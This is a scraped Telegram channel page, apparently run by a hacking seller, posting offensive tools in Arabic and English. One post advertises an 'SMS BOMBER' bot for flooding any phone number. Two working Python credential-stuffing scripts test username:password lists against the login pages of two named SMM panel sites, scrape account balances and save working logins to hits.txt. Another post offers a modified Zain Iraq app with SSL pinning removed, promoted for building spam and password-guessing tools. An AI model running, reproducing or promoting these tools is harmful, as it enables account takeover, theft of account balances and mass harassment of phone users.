Арабский питон
Kanalga Telegram’da o‘tish
Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!
Ko'proq ko'rsatish1 853
Obunachilar
-5724 soatlar
-2167 kunlar
-1 07230 kunlar
Postlar arxiv
1 853
🚀 SMS BOMBER GLOBAL | JNRAL EDITION 🚀
أقوى وأسرع بوت "سبام" دولي على التيليجرام! 🌍🔥
[ 🛠 مـمـيـزات الـبـوت ]
⚡ Speed: إرسال فائق السرعة (بدون حظر).
🌐 Global: يدعم جميع دول العالم بلا استثناء.
🔄 Updated: واجهات (APIs) شغالة 24 ساعة.
🛡 Safe: حماية تامة لخصوصية المستخدم.
[ 📝 طـريـقـة الاسـتـخـدام ]
فقط أرسل الرقم مع مفتاح الدولة (مثال: +964...) واستمتع بقوة الإرسال!
👑 المطور: JNRAL
🆔 يوزري: @r_9he
🤖 رابط البوت: [ @G_d_bbot ]
1 853
import requests,re,threading
from concurrent.futures import ThreadPoolExecutor
cf="u.txt"
lk=threading.Lock()
ht=0
bd=0
def ck(cm):
global ht,bd
try:
un,pw=cm.strip().split(':')
except:return
ul="https://smmworldpanel.com"
ss=requests.Session()
rg=ss.get(ul,timeout=10)
cs=re.search(r'name="_csrf" value="([^"]+)"',rg.text)
if not cs:
print(f'\033[1;31mBAD\033[0m : {cm}')
tk=cs.group(1)
pd={'LoginForm[username]':un,'LoginForm[password]':pw,'_csrf':tk}
hd={'User-Agent':"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36",'Accept':"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",'Accept-Encoding':"gzip, deflate, br, zstd",'Cache-Control':"max-age=0",'sec-ch-ua':'"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"','sec-ch-ua-mobile':"?1",'sec-ch-ua-platform':'"Android"','Origin':ul,'Upgrade-Insecure-Requests':"1",'Sec-Fetch-Site':"same-origin",'Sec-Fetch-Mode':"navigate",'Sec-Fetch-User':"?1",'Sec-Fetch-Dest':"document",'Referer':ul,'Accept-Language':"ar-IQ,ar;q=0.9,en-IQ;q=0.8,en-US;q=0.7,en;q=0.6"}
rp=ss.post(ul,data=pd,headers=hd,timeout=10)
ba=re.search(r'<div class="app-user-balance">Balance: <span>\$([0-9.]+)</span>',rp.text)
if not ba:ba=re.search(r'<span class="balance-box">\$([0-9.]+)</span>',rp.text)
if ba:
bl=ba.group(1)
print(f'\033[1;32mGOOD\033[0m : {cm} | Balance: ${bl}')
with open("hits.txt","a")as f:f.write(f"{cm} | Balance: ${bl}\n")
else:
print(f'\033[1;31mBAD\033[0m : {cm}')
try:
with open(cf,'r')as f:cb=f.read().splitlines()
except:
print("File not found")
exit()
with ThreadPoolExecutor(max_workers=5)as ex:ex.map(ck,cb)
ذا على smmworldpanel.com1 853
import requests,re,threading
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup
cf="u.txt"
lk=threading.Lock()
ht=0
bd=0
def gc(ul):
ss=requests.Session()
hd={'User-Agent':"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36"}
rp=ss.get(ul,headers=hd,timeout=10)
sp=BeautifulSoup(rp.text,'html.parser')
cs=sp.find('input',{'name':'_csrf'})
if cs:return ss,cs.get('value')
return None,None
def eb(ht):
sp=BeautifulSoup(ht,'html.parser')
sb=sp.find('h4',string=re.compile(r'\$'))
if sb:
tx=sb.get_text(strip=True)
mt=re.search(r'\$([0-9.,]+)',tx)
if mt:return"$"+mt.group(1).replace(',','')
dc=sp.find('div',class_='dcb-count')
if dc:
tx=dc.get_text(strip=True)
mt=re.search(r'\$([0-9.,]+)',tx)
if mt:return"$"+mt.group(1).replace(',','')
mt=re.search(r'Balance.*?\$([0-9.,]+)',ht,re.DOTALL)
if mt:return"$"+mt.group(1).replace(',','')
return None
def ck(cm):
global ht,bd
try:
un,pw=cm.strip().split(':')
except:return
ul="https://auto-sm.com"
ss,cs=gc(ul)
if not ss or not cs:
print(f'\033[1;31mBAD\033[0m : {cm}')
pd={'LoginForm[username]':un,'LoginForm[password]':pw,'_csrf':cs}
hd={'User-Agent':"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36",'Accept':"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",'Content-Type':"application/x-www-form-urlencoded",'Origin':ul,'Referer':f"{ul}/"}
try:
rp=ss.post(ul,data=pd,headers=hd,timeout=10,allow_redirects=True)
hl=rp.text.lower()
if 'incorrect username or password' in hl or 'invalid login' in hl or 'loginform[username]' in hl:
print(f'\033[1;31mBAD\033[0m : {cm}')
ba=eb(rp.text)
if ba:
print(f'\033[1;32mGOOD\033[0m : {cm} | Balance: {ba}')
with open("hits.txt","a")as f:f.write(f"{cm} | Balance: {ba}\n")
else:
print(f'\033[1;31mBAD\033[0m : {cm}')
except:
print(f'\033[1;31mBAD\033[0m : {cm}')
try:
with open(cf,'r')as f:cb=f.read().splitlines()
except:
print("File not found")
exit()
with ThreadPoolExecutor(max_workers=5)as ex:ex.map(ck,cb)
شيكر على auto-sm.com1 853
تطبيق Zain Iraq (زين العراق) مكسور SSL بل كامل 🤍
الاصدار :- الاخير 🤍
هل يوجد كراش :- لا 🤍
شغال طبيعي : - نعم 🤍
اخر اصدار :- نعم 🤍
الشخص الذي كسره :- @r_9he 🤯
الاستفاده:- تكدرون تصنعون منه اداه تـخـمـيـن وبعد هواي شغلات 🙈
تطبيقات اكسرهم 👇
DeF~@r_9he
Zain Iraq app completely SSL cracked👑💙
Version: V1.2.132💙
Crashes: No💙
Works normally: Yes💙
Latest version: Yes💙
Cracked by: @r_9he✔️
Uses: You can create a spam ✅tool for messages
Apps that break them 👇
DeF~@r_9he
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
